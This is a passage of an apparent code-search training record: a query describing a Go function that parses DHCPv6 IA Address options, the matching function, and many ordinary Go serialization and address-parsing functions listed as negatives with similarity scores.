{\n\tcase []byte:\n\t\tdata = vt\n\tcase *[]byte:\n\t\tdata = *vt\n\tcase string:\n\t\tdata = StrToBytes(vt)\n\tcase *string:\n\t\tdata = StrToBytes(*vt)\n\tcase error:\n\t\tdata = StrToBytes(vt.Error())\n\tcase *error:\n\t\tdata = StrToBytes((*vt).Error())\n\tdefault:\n\t\tif codec == nil {\n\t\t\tcodec = acodec.DefaultCodec\n\t\t}\n\t\tdata, err = codec.Marshal(vt)\n\t\tif err != nil {\n\t\t\tlog.Error(\"ValueToBytes: %v\", err)\n\t\t}\n\t}\n\n\treturn data\n}", "func (cw *CapWriter) Bytes() []byte { return []byte(*cw) }", "func ToJSONBytes(i interface{}) ([]byte, error) {\n\treturn json.Marshal(i)\n}", "func AsBytes(objs ...interface{}) []byte {\n\tbbuf, err := EncodeBytes(objs...)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn bbuf\n}", "func (s *SOC) toBytes() []byte {\n\tbuf := bytes.NewBuffer(nil)\n\tbuf.Write(s.id)\n\tbuf.Write(s.signature)\n\tbuf.Write(s.chunk.Data())\n\treturn buf.Bytes()\n}", "func (o TableExternalDataConfigurationJsonOptionsOutput) Encoding() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v TableExternalDataConfigurationJsonOptions) *string { return v.Encoding }).(pulumi.StringPtrOutput)\n}", "func (b *Bitset) ToString() string {\n\tjson, err := b.BS.MarshalJSON()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\treturn string(json[1 : len(string(json))-2])\n}", "func (s AwsElasticsearchDomainEncryptionAtRestOptions) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (m *RuntimeClassStrategyOptions) ToJSON() (string, error) {\n\treturn codec.ToJSON(m)\n}", "func marshalChoke(info *Choke) ([]byte, error) {\n\toptions := []tcOption{}\n\n\tif info == nil {\n\t\treturn []byte{}, fmt.Errorf(\"Choke: %w\", ErrNoArg)\n\t}\n\n\tvar multiError error\n\t// TODO: improve logic and check combinations\n\tif info.Parms != nil {\n\t\tdata, err := marshalStruct(info.Parms)\n\t\tmultiError = concatError(multiError, err)\n\t\toptions = append(options, tcOption{Interpretation: vtBytes, Type: tcaChokeParms, Data: data})\n\t}\n\n\tif info.MaxP != nil {\n\t\toptions = append(options, tcOption{Interpretation: vtUint32, Type: tcaChokeMaxP, Data: uint32Value(info.MaxP)})\n\t}\n\n\tif multiError != nil {\n\t\treturn []byte{}, multiError\n\t}\n\n\treturn marshalAttributes(options)\n}", "func ToBytes(val interface{}) ([]byte, error) {\n\tswitch val.(type) {\n\tcase string:\n\t\treturn []byte(val.(string)), nil\n\tcase []byte:\n\t\tb := make([]byte, len(val.([]byte)))\n\t\tcopy(b, val.([]byte))\n\t\treturn b, nil\n\tdefault:\n\t\treturn json.Marshal(val)\n\t}\n}", "func (s BookingOptions) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (*WriteOptions) Descriptor() ([]byte, []int) {\n\treturn file_proto_store_store_proto_rawDescGZIP(), []int{5}\n}", "func (p *powerCtl) toByte() (bits uint8) {\n\tbits = 0x00\n\tbits = bits | (p.link << 5)\n\tbits = bits | (p.autoSleep << 4)\n\tbits = bits | (p.measure << 3)\n\tbits = bits | (p.sleep << 2)\n\tbits = bits | p.wakeUp\n\n\treturn bits\n}", "func (u UUID) Bytes() []byte {\n\treturn u[:]\n}", "func (u UUID) Bytes() []byte {\n\treturn u[:]\n}", "func (op *OptDomainSearch) ToBytes() []byte {\n\tbuf := []byte{byte(op.Code()), byte(op.Length())}\n\tbuf = append(buf, rfc1035label.LabelsToBytes(op.DomainSearch)...)\n\treturn buf\n}", "func (e *Encoder) Bytes() []byte {\n\treturn e.out\n}", "func (adaType *AdaSuperType) Option() string {\n\tvar buffer bytes.Buffer\n\tfor i := 0; i < len(fieldOptions); i++ {\n\t\tif (adaType.options & (1 << uint(i))) > 0 {\n\t\t\tif buffer.Len() > 0 {\n\t\t\t\tbuffer.WriteString(\",\")\n\t\t\t}\n\t\t\tbuffer.WriteString(fieldOptions[i])\n\t\t}\n\t}\n\treturn buffer.String()\n}", "func (u UUID) Bytes() []byte {\n\tb := u.Format()\n\treturn b[:]\n}", "func (s AwsElasticsearchDomainNodeToNodeEncryptionOptions) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (p *PrivateKey) Serialize() []byte {\n\tb := make([]byte, 0, PrivKeyBytesLen)\n\treturn paddedAppend(PrivKeyBytesLen, b, p.ToECDSA().D.Bytes())\n}", "func (*Options) Descriptor() ([]byte, []int) {\n\treturn file_github_com_containerd_containerd_pkg_runtimeoptions_v1_api_proto_rawDescGZIP(), []int{0}\n}", "func BoolToBytes(b bool) []byte {\n\tif b {\n\t\treturn []byte{1}\n\t}\n\treturn []byte{0}\n}", "func (*ListOption) Descriptor() ([]byte, []int) {\n\treturn file_ocis_messages_settings_v0_settings_proto_rawDescGZIP(), []int{11}\n}", "func (k *Key) ToBytes() []byte {\n\tbuf := &bytes.Buffer{}\n\tbuf.Write(encoding.Uint16ToBytes(k.DBIndex))\n\tbuf.WriteByte(k.MetaType)\n\tbuf.Write(k.Name)\n\treturn buf.Bytes()\n}", "func (a ApplicationGatewayAvailableSSLOptions) MarshalJSON() ([]byte, error) {\n\tobjectMap := make(map[string]any)\n\tpopulate(objectMap, \"id\", a.ID)\n\tpopulate(objectMap, \"location\", a.Location)\n\tpopulate(objectMap, \"name\", a.Name)\n\tpopulate(objectMap, \"properties\", a.Properties)\n\tpopulate(objectMap, \"tags\", a.Tags)\n\tpopulate(objectMap, \"type\", a.Type)\n\treturn json.Marshal(objectMap)\n}", "func (d *Descriptor) Bytes() ([]byte, error) {\n\tbuf, err := json.MarshalIndent(d, \"\", \" \")\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"descriptor: serializing failed: %v\", err)\n\t}\n\treturn buf, nil\n}", "func ToByteArr(v interface{}) (result []byte) {\n\tresult = []byte(\"\")\n\tif v == nil {\n\t\treturn result\n\t}\n\n\tswitch v := v.(type) {\n\tcase string:\n\t\tresult = []byte(v)\n\tcase int:\n\t\tresult = []byte(strconv.Itoa(v))\n\tcase int64:\n\t\tresult = []byte(strconv.FormatInt(v, 10))\n\tcase bool:\n\t\tresult = []byte(strconv.FormatBool(v))\n\tcase float64:\n\t\tresult = []byte(strconv.FormatFloat(v, 'E', -1, 64))\n\tcase []uint8:\n\t\tresult = v\n\tdefault:\n\t\tresultJSON, err := json.Marshal(v)\n\t\tif err == nil {\n\t\t\tresult = resultJSON\n\t\t} else {\n\t\t\tlog.Println(\"func ToByteArr\", err)\n\t\t}\n\t}\n\n\treturn result\n}", "func (o *UlimitOpt) String() string {\n\tvar out []string\n\tfor _, v := range *o.values {\n\t\tout = append(out, v.String())\n\t}\n\n\treturn fmt.Sprintf(\"%v\", out)\n}", "func (r *RecBytes) Serialize() []byte {\n\tres := make([]byte, 0, len(r.Path)+len(r.Time)+len(r.Val)+3)\n\tres = append(res, r.Path...)\n\tres = append(res, ' ')\n\tres = append(res, r.Val...)\n\tres = append(res, ' ')\n\tres = append(res, r.Time...)\n\tres = append(res, '\\n')\n\n\treturn res\n}", "func ToBytes(data Data) ([]byte, error) {\n\tbyteData, err := yaml.Marshal(data)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"could not marshal config data: %w\", err)\n\t}\n\treturn byteData, nil\n}", "func (chains createChainList) Bytes() []byte {\n\tbytes, _ := Codec.Marshal(chains)\n\treturn bytes\n}", "func (r RelayOptions) String() string {\n\treturn \"\\n\" + r.Options.ToString(relayHumanizer)\n}", "func (*Option) Descriptor() ([]byte, []int) {\n\treturn file_survey_proto_rawDescGZIP(), []int{0}\n}", "func SerializerToBytes(value interface{}) ([]byte, error) {\n\tbyte, err := json.Marshal(value)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn byte, nil\n}", "func (*StringOptionProperty) Descriptor() ([]byte, []int) {\n\treturn file_furo_property_proto_rawDescGZIP(), []int{0}\n}" ]
[ "0.662458", "0.6141097", "0.6119789", "0.592543", "0.58298486", "0.5789778", "0.5768851", "0.5758986", "0.55623716", "0.5534493", "0.5529802", "0.55006707", "0.5478043", "0.54404587", "0.544039", "0.5413461", "0.5400102", "0.5378529", "0.53535604", "0.5350149", "0.53383946", "0.53181654", "0.5298245", "0.52857244", "0.52826023", "0.52721035", "0.5265388", "0.52587146", "0.52503836", "0.52488685", "0.5245259", "0.5244292", "0.5235014", "0.5227847", "0.52250063", "0.5213139", "0.51752675", "0.5167217", "0.51545566", "0.51335883", "0.5123326", "0.51165044", "0.5114768", "0.5101631", "0.5078475", "0.5076681", "0.5075605", "0.5068984", "0.5066217", "0.5059263", "0.5057547", "0.505092", "0.5036102", "0.5022464", "0.5018517", "0.50173086", "0.5002938", "0.5000354", "0.49952066", "0.49916375", "0.49858844", "0.4984633", "0.49827236", "0.4980871", "0.49744707", "0.49651253", "0.49641028", "0.49633586", "0.49466476", "0.49450877", "0.49430883", "0.49305987", "0.49273324", "0.49259514", "0.49130753", "0.48981598", "0.4896199", "0.48875895", "0.48875895", "0.48864663", "0.4879061", "0.48773476", "0.48771155", "0.48748142", "0.48739663", "0.48690757", "0.48685396", "0.48645228", "0.48623803", "0.48504066", "0.48456636", "0.48452643", "0.48392883", "0.48343945", "0.48058546", "0.4797679", "0.47976387", "0.4786575", "0.47846138", "0.47832564" ]
0.6159494
1
ParseOptIAAddress builds an OptIAAddress structure from a sequence of bytes. The input data does not include option code and length bytes.
func ParseOptIAAddress(data []byte) (*OptIAAddress, error) { var opt OptIAAddress buf := uio.NewBigEndianBuffer(data) opt.IPv6Addr = net.IP(buf.CopyN(net.IPv6len)) opt.PreferredLifetime = buf.Read32() opt.ValidLifetime = buf.Read32() if err := opt.Options.FromBytes(buf.ReadAll()); err != nil { return nil, err } return &opt, buf.FinError() }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func ParseAddress(addr string) (*Address, error) {\n\taddr = strings.ToUpper(addr)\n\tl := len(addr)\n\tif l < 50 {\n\t\treturn nil, InvalidAccountAddrError{reason: \"length\"}\n\t}\n\ti := l - 50 // start index of hex\n\n\tidh, err := hex.DecodeString(addr[i:])\n\tif err != nil {\n\t\treturn nil, InvalidAccountAddrError{reason: \"hex\"}\n\t}\n\n\t_addr := &Address{}\n\t_addr.Code = addr[0:i]\n\t_addr.Type = AccountType(idh[0])\n\t_addr.Hash = idh[1:]\n\n\tif err = _addr.Validate(); err != nil {\n\t\treturn nil, err\n\t}\n\treturn _addr, nil\n}", "func ParseAddress(address []byte, options AddressParserOptions) *AddressParserResponse {\n\tcaddress, _ := (*C.char)(unsafe.Pointer((*sliceHeader)(unsafe.Pointer(&address)).Data)), cgoAllocsUnknown\n\tcoptions, _ := options.PassValue()\n\t__ret := C.parse_address(caddress, coptions)\n\t__v := NewAddressParserResponseRef(unsafe.Pointer(__ret))\n\treturn __v\n}", "func DecodeAddress(b []byte) (net.IP, []byte, error) {\n\tif len(b) < 6 {\n\t\treturn nil, nil, errors.New(\"too short\")\n\t}\n\n\t// IPv4\n\tif b[0] == 4 && b[1] == 4 {\n\t\treturn net.IP(b[2:6]), b[6:], nil\n\t}\n\n\t// IPv6\n\tif len(b) < 18 {\n\t\treturn nil, nil, errors.New(\"too short\")\n\t}\n\tif b[0] == 6 && b[1] == 16 {\n\t\treturn net.IP(b[2:18]), b[18:], nil\n\t}\n\n\treturn nil, nil, errors.New(\"unrecognized format\")\n}", "func ParseAddress(address string) Address {\n\tif !TrackPositions {\n\t\treturn 0\n\t}\n\taddr, _ := strconv.ParseUint(address, 0, 64)\n\n\treturn Address(addr)\n}", "func ParseAddress(address string) (common.Address, error) {\n\tif common.IsHexAddress(address) {\n\t\treturn common.HexToAddress(address), nil\n\t}\n\treturn common.Address{}, fmt.Errorf(\"invalid address: %v\", address)\n}", "func ParseAddress(addr string) Address {\n\t// Handle IPv6 address in form as \"[2001:4860:0:2001::68]\"\n\tlenAddr := len(addr)\n\tif lenAddr > 0 && addr[0] == '[' && addr[lenAddr-1] == ']' {\n\t\taddr = addr[1 : lenAddr-1]\n\t}\n\taddr = strings.TrimSpace(addr)\n\n\tip := net.ParseIP(addr)\n\tif ip != nil {\n\t\treturn IPAddress(ip)\n\t}\n\treturn DomainAddress(addr)\n}", "func ParseAddress(address string) (*Address, errors.TracerError) {\n\taddr := &Address{}\n\tif ValidateIPv6Address(address) {\n\t\tclean, testPort := cleanIPv6(address)\n\t\thasPort := false\n\t\tport := 0\n\t\tif testPort > 0 {\n\t\t\thasPort = true\n\t\t\tport = testPort\n\t\t}\n\t\treturn &Address{Host: clean, Port: port, IsIPv6: true, HasPort: hasPort}, nil\n\t}\n\tcolons := strings.Count(address, \":\")\n\tif colons > 1 {\n\t\treturn nil, errors.New(\"Invalid address: too many colons '%s'\", address)\n\t} else if colons == 0 {\n\t\treturn &Address{Host: address, HasPort: false}, nil\n\t}\n\tsplit := strings.Split(address, \":\")\n\taddr.Host = split[0]\n\tport, err := strconv.Atoi(split[1])\n\tif err != nil {\n\t\treturn nil, errors.New(\"address '%s' is invalid: could not parse port data, %s\", address, err)\n\t}\n\tif port <= 0 || port > math.MaxUint16 {\n\t\treturn nil, errors.New(\"port '%d' is not a valid port number, must be uint16\", port)\n\t}\n\taddr.Port = port\n\taddr.HasPort = true\n\treturn addr, nil\n}", "func DecodeAddress(address string) (*Address, error) {\n\t// if address[:3] == \"BM-\" { // Clients should accept addresses without BM-\n\t//\taddress = address[3:]\n\t// }\n\t//\n\t// decodeAddress says this but then UI checks for a missingbm status from\n\t// decodeAddress, which doesn't exist. So I choose NOT to accept addresses\n\t// without the initial \"BM-\"\n\n\ti, err := base58.DecodeToBig([]byte(address[3:]))\n\tif err != nil {\n\t\treturn nil, errors.New(\"input address not valid base58 string\")\n\t}\n\tdata := i.Bytes()\n\n\thashData := data[:len(data)-4]\n\tchecksum := data[len(data)-4:]\n\n\t// Take two rounds of SHA512 hashes\n\tsha := sha512.New()\n\tsha.Write(hashData)\n\tcurrentHash := sha.Sum(nil)\n\tsha.Reset()\n\tsha.Write(currentHash)\n\n\tif !bytes.Equal(checksum, sha.Sum(nil)[0:4]) {\n\t\treturn nil, errors.New(\"checksum failed\")\n\t}\n\t// create the address\n\taddr := new(Address)\n\n\tbuf := bytes.NewReader(data)\n\n\terr = addr.Version.DeserializeReader(buf) // get the version\n\tif err != nil {\n\t\treturn nil, types.DeserializeFailedError(\"version: \" + err.Error())\n\t}\n\n\terr = addr.Stream.DeserializeReader(buf)\n\tif err != nil {\n\t\treturn nil, types.DeserializeFailedError(\"stream: \" + err.Error())\n\t}\n\n\tripe := make([]byte, buf.Len()-4) // exclude bytes already read and checksum\n\tn, err := buf.Read(ripe)\n\tif n != len(ripe) || err != nil {\n\t\treturn nil, types.DeserializeFailedError(\"ripe: \" + err.Error())\n\t}\n\n\tswitch addr.Version {\n\tcase 2:\n\t\tfallthrough\n\tcase 3:\n\t\tif len(ripe) > 20 || len(ripe) < 18 { // improper size\n\t\t\treturn nil, errors.New(\"version 3, the ripe length is invalid\")\n\t\t}\n\tcase 4:\n\t\t// encoded ripe data MUST have null bytes removed from front\n\t\tif ripe[0] == 0x00 {\n\t\t\treturn nil, errors.New(\"version 4, ripe data has null bytes in\" +\n\t\t\t\t\" the beginning, not properly encoded\")\n\t\t}\n\t\tif len(ripe) > 20 || len(ripe) < 4 { // improper size\n\t\t\treturn nil, errors.New(\"version 4, the ripe length is invalid\")\n\t\t}\n\tdefault:\n\t\treturn nil, errors.New(\"unsupported address version\")\n\t}\n\n\t// prepend null bytes to make sure that the total ripe length is 20\n\tnumPadding := 20 - len(ripe)\n\tripe = append(make([]byte, numPadding), ripe...)\n\tcopy(addr.Ripe[:], ripe)\n\n\treturn addr, nil\n}", "func ParseAddress(addr interface{}) (a Address, err error) {\n\t// handle the allowed types\n\tswitch addrVal := addr.(type) {\n\tcase string: // simple string value\n\t\tif addrVal == \"\" {\n\t\t\terr = errors.New(\"Recipient.Address may not be empty\")\n\t\t} else {\n\t\t\ta.Email = addrVal\n\t\t}\n\n\tcase Address:\n\t\ta = addr.(Address)\n\n\tcase map[string]interface{}:\n\t\t// auto-parsed nested json object\n\t\tfor k, v := range addrVal {\n\t\t\tswitch vVal := v.(type) {\n\t\t\tcase string:\n\t\t\t\tif strings.EqualFold(k, \"name\") {\n\t\t\t\t\ta.Name = vVal\n\t\t\t\t} else if strings.EqualFold(k, \"email\") {\n\t\t\t\t\ta.Email = vVal\n\t\t\t\t} else if strings.EqualFold(k, \"header_to\") {\n\t\t\t\t\ta.HeaderTo = vVal\n\t\t\t\t}\n\t\t\tdefault:\n\t\t\t\terr = errors.New(\"strings are required for all Recipient.Address values\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\tcase map[string]string:\n\t\t// user-provided json literal (convenience)\n\t\tfor k, v := range addrVal {\n\t\t\tif strings.EqualFold(k, \"name\") {\n\t\t\t\ta.Name = v\n\t\t\t} else if strings.EqualFold(k, \"email\") {\n\t\t\t\ta.Email = v\n\t\t\t} else if strings.EqualFold(k, \"header_to\") {\n\t\t\t\ta.HeaderTo = v\n\t\t\t}\n\t\t}\n\n\tdefault:\n\t\terr = errors.Errorf(\"unsupported Recipient.Address value type [%T]\", addrVal)\n\t}\n\n\treturn\n}", "func ParseAddress(s string) (Address, error) {\n\n\tvar family uint8\n\tvar sn uint64\n\tvar crcStr string\n\tcnt, err := fmt.Sscanf(s, \"%x.%x.%s\", &family, &sn, &crcStr)\n\n\tif (nil != err) || (3 != cnt) || (sn != (0xffffffffffff & sn)) {\n\t\treturn 0, errors.New(\"onewire: invalid address \" + s)\n\t}\n\ta := sn<<8 | (uint64(family) << 56)\n\n\tbuf := make([]byte, 8)\n\tbinary.LittleEndian.PutUint64(buf, sn<<8|(uint64(family)<<56))\n\n\tcrc := RevCrc8(buf[1:])\n\n\tif \"--\" != crcStr {\n\t\tvar c uint8\n\t\tcnt, err = fmt.Sscanf(crcStr, \"%x\", &c)\n\t\tif c != crc {\n\t\t\treturn 0, errors.New(\"onewire: invalid crc \" + s)\n\t\t}\n\t}\n\n\ta |= 0xff & uint64(crc)\n\n\treturn Address(a), nil\n}", "func TestIAAddrUnmarshalBinary(t *testing.T) {\n\tvar tests = []struct {\n\t\tdesc string\n\t\tbuf []byte\n\t\tiaaddr *IAAddr\n\t\terr error\n\t}{\n\t\t{\n\t\t\tdesc: \"one byte IAAddr\",\n\t\t\tbuf: []byte{0},\n\t\t\terr: io.ErrUnexpectedEOF,\n\t\t},\n\t\t{\n\t\t\tdesc: \"23 bytes IAAddr\",\n\t\t\tbuf: bytes.Repeat([]byte{0}, 23),\n\t\t\terr: io.ErrUnexpectedEOF,\n\t\t},\n\t\t{\n\t\t\tdesc: \"preferred greater than valid lifetime\",\n\t\t\tbuf: append(net.IPv6zero, []byte{\n\t\t\t\t0, 0, 0, 2,\n\t\t\t\t0, 0, 0, 1,\n\t\t\t}...),\n\t\t\terr: ErrInvalidLifetimes,\n\t\t},\n\t\t{\n\t\t\tdesc: \"invalid options (length mismatch)\",\n\t\t\tbuf: append(net.IPv6zero, []byte{\n\t\t\t\t0, 0, 0, 1,\n\t\t\t\t0, 0, 0, 2,\n\t\t\t\t0, 1, 0, 1,\n\t\t\t}...),\n\t\t\terr: dhcp6.ErrInvalidOptions,\n\t\t},\n\t\t{\n\t\t\tdesc: \"IPv6 loopback, 1s preferred, 2s valid, no options\",\n\t\t\tbuf: append(net.IPv6loopback, []byte{\n\t\t\t\t0, 0, 0, 1,\n\t\t\t\t0, 0, 0, 2,\n\t\t\t}...),\n\t\t\tiaaddr: &IAAddr{\n\t\t\t\tIP: net.IPv6loopback,\n\t\t\t\tPreferredLifetime: 1 * time.Second,\n\t\t\t\tValidLifetime: 2 * time.Second,\n\t\t\t},\n\t\t},\n\t\t{\n\t\t\tdesc: \"IPv6 loopback, 1s preferred, 2s valid, option client ID [0 1]\",\n\t\t\tbuf: append(net.IPv6loopback, []byte{\n\t\t\t\t0, 0, 0, 1,\n\t\t\t\t0, 0, 0, 2,\n\t\t\t\t0, 1, 0, 2, 0, 1,\n\t\t\t}...),\n\t\t\tiaaddr: &IAAddr{\n\t\t\t\tIP: net.IPv6loopback,\n\t\t\t\tPreferredLifetime: 1 * time.Second,\n\t\t\t\tValidLifetime: 2 * time.Second,\n\t\t\t\tOptions: dhcp6.Options{\n\t\t\t\t\tdhcp6.OptionClientID: [][]byte{{0, 1}},\n\t\t\t\t},\n\t\t\t},\n\t\t},\n\t}\n\n\tfor i, tt := range tests {\n\t\tiaaddr := new(IAAddr)\n\t\tif err := iaaddr.UnmarshalBinary(tt.buf); err != nil {\n\t\t\tif want, got := tt.err, err; want != got {\n\t\t\t\tt.Fatalf(\"[%02d] test %q, unexpected error for parseIAAddr: %v != %v\",\n\t\t\t\t\ti, tt.desc, want, got)\n\t\t\t}\n\n\t\t\tcontinue\n\t\t}\n\n\t\twant, err := tt.iaaddr.MarshalBinary()\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\t\tgot, err := iaaddr.MarshalBinary()\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tif !bytes.Equal(want, got) {\n\t\t\tt.Fatalf(\"[%02d] test %q, unexpected IAAddr bytes for parseIAAddr:\\n- want: %v\\n- got: %v\",\n\t\t\t\ti, tt.desc, want, got)\n\t\t}\n\n\t\tfor _, v := range iaaddr.Options {\n\t\t\tfor ii := range v {\n\t\t\t\tif want, got := cap(v[ii]), cap(v[ii]); want != got {\n\t\t\t\t\tt.Fatalf(\"[%02d] test %q, unexpected capacity option data:\\n- want: %v\\n- got: %v\",\n\t\t\t\t\t\ti, tt.desc, want, got)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "func ParseAddress(s string) (Address, error) {\n\tvar addr Address\n\terr := addr.parse(s)\n\treturn addr, err\n}", "func ParseAddress(address string) (string, int) {\n\tmatch, err := gregex.MatchString(`^(.+):(\\d+)$`, address)\n\tif err == nil {\n\t\ti, _ := strconv.Atoi(match[2])\n\t\treturn match[1], i\n\t}\n\treturn \"\", 0\n}", "func ParseAddress(tp string) error {\n\t// check source\n\tif tp == conf.TypeDump || tp == conf.TypeSync || tp == conf.TypeRump {\n\t\tif err := parseAddress(tp, conf.Options.SourceAddress, conf.Options.SourceType, true); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif len(conf.Options.SourceAddressList) == 0 {\n\t\t\treturn fmt.Errorf(\"source address shouldn't be empty when type in {dump, sync, rump}\")\n\t\t}\n\t}\n\n\t// check target\n\tif tp == conf.TypeRestore || tp == conf.TypeSync || tp == conf.TypeRump {\n\t\tif err := parseAddress(tp, conf.Options.TargetAddress, conf.Options.TargetType, false); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tif len(conf.Options.TargetAddressList) == 0 {\n\t\t\treturn fmt.Errorf(\"target address shouldn't be empty when type in {restore, sync, rump}\")\n\t\t}\n\t}\n\n\treturn nil\n}", "func (op *OptIAAddress) ToBytes() []byte {\n\tbuf := uio.NewBigEndianBuffer(nil)\n\tbuf.WriteBytes(op.IPv6Addr.To16())\n\tbuf.Write32(op.PreferredLifetime)\n\tbuf.Write32(op.ValidLifetime)\n\tbuf.WriteBytes(op.Options.ToBytes())\n\treturn buf.Data()\n}", "func DecodeAddress(address string) (*Address, error) {\n\tif address[:3] == \"BM-\" { // Clients should accept addresses without BM-\n\t\taddress = address[3:]\n\t}\n\n\tdata := base58.Decode(address)\n\tif len(data) <= 12 { // rough lower bound, also don't want it to be empty\n\t\treturn nil, ErrUnknownAddressType\n\t}\n\n\thashData := data[:len(data)-4]\n\tchecksum := data[len(data)-4:]\n\n\tif !bytes.Equal(checksum, DoubleSha512(hashData)[0:4]) {\n\t\treturn nil, ErrChecksumMismatch\n\t}\n\t// create the address\n\taddr := new(Address)\n\n\tbuf := bytes.NewReader(data)\n\tvar err error\n\n\taddr.Version, err = ReadVarInt(buf) // read version\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\taddr.Stream, err = ReadVarInt(buf) // read stream\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tripe := make([]byte, buf.Len()-4) // exclude bytes already read and checksum\n\tbuf.Read(ripe) // this can never cause an error\n\n\tswitch addr.Version {\n\tcase 2:\n\t\tfallthrough\n\tcase 3:\n\t\tif len(ripe) > 19 || len(ripe) < 18 { // improper size\n\t\t\treturn nil, errors.New(\"version 3, the ripe length is invalid\")\n\t\t}\n\tcase 4:\n\t\t// encoded ripe data MUST have null bytes removed from front\n\t\tif ripe[0] == 0x00 {\n\t\t\treturn nil, errors.New(\"version 4, ripe data has null bytes in\" +\n\t\t\t\t\" the beginning, not properly encoded\")\n\t\t}\n\t\tif len(ripe) > 19 || len(ripe) < 4 { // improper size\n\t\t\treturn nil, errors.New(\"version 4, the ripe length is invalid\")\n\t\t}\n\tdefault:\n\t\treturn nil, ErrUnknownAddressType\n\t}\n\n\t// prepend null bytes to make sure that the total ripe length is 20\n\tnumPadding := 20 - len(ripe)\n\tripe = append(make([]byte, numPadding), ripe...)\n\tcopy(addr.Ripe[:], ripe)\n\n\treturn addr, nil\n}", "func (_TokenVesting *TokenVestingSession) ParseAddr(data []byte) (common.Address, error) {\n\treturn _TokenVesting.Contract.ParseAddr(&_TokenVesting.CallOpts, data)\n}", "func DecodeAddress(addr string, params AddressParams) (Address, error) {\n\t// Parsing code for future address/script versions should be added as the\n\t// most recent case in the switch statement. The expectation is that newer\n\t// version addresses will become more common, so they should be checked\n\t// first.\n\tswitch {\n\tcase probablyV0Base58Addr(addr):\n\t\treturn DecodeAddressV0(addr, params)\n\t}\n\n\tstr := fmt.Sprintf(\"address %q is not a supported type\", addr)\n\treturn nil, makeError(ErrUnsupportedAddress, str)\n}", "func (p *AddressParser) Parse(address string) (*Address, error)", "func (op *optDNS) FromBytes(data []byte) error {\n\tbuf := uio.NewBigEndianBuffer(data)\n\tfor buf.Has(net.IPv6len) {\n\t\top.NameServers = append(op.NameServers, buf.CopyN(net.IPv6len))\n\t}\n\treturn buf.FinError()\n}", "func (_TokenVesting *TokenVestingCallerSession) ParseAddr(data []byte) (common.Address, error) {\n\treturn _TokenVesting.Contract.ParseAddr(&_TokenVesting.CallOpts, data)\n}", "func decodeAddress(address string) (uint32, error) {\n\tsplit := strings.Split(address, \".\")\n\tif len(split) != 4 {\n\t\treturn 0, errors.New(\"Error decoding IPv4 address: wrong amount of octets\")\n\t}\n\tvar IPaddress uint32\n\tfor i, octetstr := range split {\n\t\tsegment, err := strconv.Atoi(octetstr)\n\t\tif err != nil {\n\t\t\treturn 0, errors.Wrap(err, \"Error decoding IPv4 address\")\n\t\t}\n\t\tif segment > math.MaxUint8 {\n\t\t\treturn 0, errors.New(\"Error decoding IPv4 address: value overflow\")\n\t\t}\n\t\t// Shift octets by determined amount of bits.\n\t\tswitch i {\n\t\tcase 0:\n\t\t\tsegment = segment << 24\n\t\tcase 1:\n\t\t\tsegment = segment << 16\n\t\tcase 2:\n\t\t\tsegment = segment << 8\n\t\t}\n\t\tIPaddress += uint32(segment)\n\t}\n\treturn IPaddress, nil\n}", "func ParseAddr(s string) (Addr, error) {\n\tcomma := strings.IndexByte(s, ',')\n\tif comma < 0 {\n\t\treturn Addr{}, serrors.New(\"invalid address: expected comma\", \"value\", s)\n\t}\n\tia, err := ParseIA(s[0:comma])\n\tif err != nil {\n\t\treturn Addr{}, err\n\t}\n\th, err := ParseHost(s[comma+1:])\n\tif err != nil {\n\t\treturn Addr{}, err\n\t}\n\treturn Addr{IA: ia, Host: h}, nil\n}", "func ParseFromIPAddr(ipNet *net.IPNet) (*IPv4Address, *IPv6Address, error) {\n\tif ipNet == nil {\n\t\treturn nil, nil, fmt.Errorf(\"Nil address: %v\", ipNet)\n\t}\n\n\tif v4Addr := ipNet.IP.To4(); v4Addr != nil {\n\t\tcidr, _ := ipNet.Mask.Size()\n\t\tret := NewIPv4AddressFromBytes(v4Addr, uint(cidr))\n\t\treturn &ret, nil, nil\n\t}\n\tif v6Addr := ipNet.IP.To16(); v6Addr != nil {\n\t\tcidr, _ := ipNet.Mask.Size()\n\t\tret := NewIPv6Address(v6Addr, uint(cidr))\n\t\treturn nil, &ret, nil\n\t}\n\n\treturn nil, nil, fmt.Errorf(\"couldn't parse either v4 or v6 address: %v\", ipNet)\n}", "func ParseAddress(addr string) (proto string, path string, err error) {\n\tm := netAddrRx.FindStringSubmatch(addr)\n\tif m == nil {\n\t\treturn \"\", \"\", goof.WithField(\"address\", addr, \"invalid address\")\n\t}\n\treturn m[1], m[2], nil\n}", "func (_TokenVesting *TokenVestingCaller) ParseAddr(opts *bind.CallOpts, data []byte) (common.Address, error) {\n\tvar (\n\t\tret0 = new(common.Address)\n\t)\n\tout := ret0\n\terr := _TokenVesting.contract.Call(opts, out, \"parseAddr\", data)\n\treturn *ret0, err\n}", "func (o *CIBVAddress) FromStringArray(sa StringArray) error {\n\tvar err error\n\tvar val int\n\tif val, err = strconv.Atoi(sa[0]); err != nil {\n\t\treturn err\n\t}\n\to.Lid = uint16(val)\n\tif val, err = strconv.Atoi(sa[1]); err != nil {\n\t\treturn err\n\t}\n\to.Qpn = uint32(val)\n\tif val, err = strconv.Atoi(sa[2]); err != nil {\n\t\treturn err\n\t}\n\to.Psn = uint32(val)\n\tif val, err = strconv.Atoi(sa[3]); err != nil {\n\t\treturn err\n\t}\n\to.Raddr = uint64(val)\n\tif val, err = strconv.Atoi(sa[4]); err != nil {\n\t\treturn err\n\t}\n\to.Rkey = uint32(val)\n\tif val, err = strconv.Atoi(sa[5]); err != nil 